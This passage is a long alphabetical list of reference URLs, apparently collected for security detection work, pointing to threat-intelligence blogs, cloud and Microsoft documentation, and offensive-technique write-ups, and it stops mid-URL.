https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\nhttps://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments\nhttps://blog.reconinfosec.com/emergence-of-akira-ransomware-group\nhttps://blog.redbluepurple.io/offensive-research/bypassing-injection-detection\nhttps://blog.redteam.pl/2020/06/black-kingdom-ransomware.html\nhttps://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/\nhttps://blog.router-switch.com/2013/11/show-running-config/\nhttps://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar\nhttps://blog.sekoia.io/darkgate-internals/\nhttps://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/\nhttps://blog.skyplabs.net/posts/container-detection/\nhttps://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/\nhttps://blog.sygnia.co/kaseya-ransomware-supply-chain-attack\nhttps://blog.talosintelligence.com/2017/05/wannacry.html\nhttps://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\nhttps://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nhttps://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nhttps://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nhttps://blog.talosintelligence.com/gophish-powerrat-dcrat/\nhttps://blog.talosintelligence.com/ipfs-abuse/\nhttps://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/\nhttps://blog.talosintelligence.com/uat-5647-romcom/\nhttps://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/\nhttps://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/\nhttps://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/\nhttps://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/\nhttps://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/\nhttps://blog.viettelcybersecurity.com/saml-show-stopper/\nhttps://blog.xpnsec.com/exploring-mimikatz-part-1/\nhttps://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/\nhttps://blog.yoroi.company/research/ursnif-long-live-the-steganography/\nhttps://blogs.blackberry.com/\nhttps://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line\nhttps://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains\nhttps://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets\nhttps://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine\nhttps://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\nhttps://blogs.jpcert.or.jp/en/2023/05/gobrat.html\nhttps://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\nhttps://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/\nhttps://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/\nhttps://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\nhttps://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html\nhttps://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\nhttps://blooteem.com/march-2022\nhttps://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html\nhttps://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2\nhttps://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\nhttps://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\nhttps://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/\nhttps://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/\nhttps://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/\nhttps://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/\nhttps://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\nhttps://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\nhttps://boinc.berkeley.edu/\nhttps://book.hacktricks.xyz/pentesting-web/file-inclusion\nhttps://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection\nhttps://book.hacktricks.xyz/shells/shells/linux\nhttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords\nhttps://book.hacktricks.xyz/windows/basic-cmd-for-pentesters\nhttps://bpftrace.org/\nhttps://breakdev.org/pwndrop/\nhttps://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\nhttps://brightsec.com/blog/sql-injection-payloads/\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5\nhttps://bunnyinside.com/?term=f71e8cb9c76a\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit\nhttps://car.mitre.org/wiki/CAR-2013-05-002\nhttps://car.mitre.org/wiki/CAR-2016-04-005\nhttps://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/\nhttps://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/\nhttps://chromeenterprise.google/policies/?policy=DnsOverHttpsMode\nhttps://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc\nhttps://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/\nhttps://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/\nhttps://cloud.google.com/access-context-manager/docs/audit-logging\nhttps://cloud.google.com/binary-authorization\nhttps://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/\nhttps://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify\nhttps://cloud.google.com/dns/docs/reference/v1/managedZones\nhttps://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts\nhttps://cloud.google.com/kubernetes-engine/docs\nhttps://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\nhttps://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control\nhttps://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\nhttps://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog\nhttps://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update\nhttps://cloud.google.com/storage/docs/json_api/v1/buckets\nhttps://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc\nhttps://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance\nhttps://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\nhttps://cobalt.io/blog/kerberoast-attack-techniques\nhttps://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\nhttps://code.visualstudio.com/docs/remote/tunnels\nhttps://codewhitesec.blogspot.com/2018/07/lethalhta.html\nhttps://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html\nhttps://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/\nhttps://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer\nhttps://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029\nhttps://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516\nhttps://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420\nhttps://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023\nhttps://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists\nhttps://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting\nhttps://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3\nhttps://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\nhttps://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection\nhttps://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html\nhttps://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\nhttps://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html\nhttps://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html\nhttps://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html\nhttps://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nhttps://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html\nhttps://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html\nhttps://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\nhttps://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\nhttps://content.fireeye.com/apt-41/rpt-apt41\nhttps://core.telegram.org/bots/faq\nhttps://corelight.com/blog/detecting-cve-2021-42292\nhttps://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/\nhttps://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/\nhttps://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/\nhttps://curl.se/docs/manpage.html\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49144\nhttps://cyber.wtf/2021/11/15/guess-whos-back/\nhttps://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\nhttps://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29\nhttps://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/\nhttps://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/\nhttps://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nhttps://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/\nhttps://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/\nhttps://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/\nhttps://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\nhttps://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/\nhttps://cydefops.com/devtunnels-unleashed\nhttps://cydefops.com/vscode-data-exfiltration\nhttps://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2\nhttps://dataconomy.com/2023/10/23/okta-data-breach/\nhttps://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/\nhttps://decoded.avast.io/martinchlumecky/png-steganography\nhttps://decoded.avast.io/martinchlumecky/png-steganography/\nhttps://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/\nhttps://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/\nhttps://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/\nhttps://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk\nhttps://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623\nhttps://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/\nhttps://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181\nhttps://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/\nhttps://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/\nhttps://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html\nhttps://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html\nhttps://developer.okta.com/docs/reference/api/event-types/\nhttps://developer.okta.com/docs/reference/api/system-log/\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html\nhttps://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html\nhttps://developers.cloudflare.com/cloudflare-one/connections/connect-apps\nhttps://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE\nhttps://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html\nhttps://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html\nhttps://developers.onelogin.com/api-docs/1/events/event-resource\nhttps://developers.onelogin.com/api-docs/1/events/event-resource/\nhttps://deviceatlas.com/blog/list-of-user-agent-strings#desktop\nhttps://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/\nhttps://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/\nhttps://digital.nhs.uk/cyber-alerts/2018/cc-2825\nhttps://dirkjanm.io/a-different-way-of-abusing-zerologon/\nhttps://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3\nhttps://dmaasland.github.io/posts/citrix.html\nhttps://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html\nhttps://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html\nhttps://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html\nhttps://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html\nhttps://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html\nhttps://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html\nhttps://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html\nhttps://docs.aws.amazon.com/cli/latest/reference/securityhub/\nhttps://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html\nhttps://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html\nhttps://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html\nhttps://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html\nhttps://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer\nhttps://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html\nhttps://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html\nhttps://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html\nhttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html\nhttps://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html\nhttps://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html\nhttps://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html\nhttps://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html\nhttps://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html\nhttps://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html\nhttps://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html\nhttps://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html\nhttps://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html\nhttps://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html\nhttps://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance\nhttps://docs.djangoproject.com/en/1.11/ref/exceptions/\nhttps://docs.djangoproject.com/en/1.11/topics/logging/#django-security\nhttps://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group\nhttps://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr\nhttps://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners\nhttps://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts\nhttps://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise\nhttps://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking\nhttps://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority\nhttps://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning\nhttps://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities\nhttps://docs.github.com/en/migrations\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization\nhttps://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization\nhttps://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership\nhttps://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories\nhttps://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository\nhttps://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit\nhttps://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nhttps://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html\nhttps://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts\nhttps://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts\nhttps://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins\nhttps://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete\nhttps://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts\nhttps://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes\nhttps://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy\nhttps://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory\nhttps://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor\nhttps://docs.microsoft.com/en-us/azure/dns/dns-zones-records\nhttps://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nhttps://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization\nhttps://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\nhttps://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy\nhttps://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference\nhttps://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nhttps://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0\nhttps://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services\nhttps://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services\nhttps://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback\nhttps://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script\nhttps://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension\nhttps://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3\nhttps://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings\nhttps://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps\nhttps://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy\nhttps://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nhttps://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature\nhttps://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowss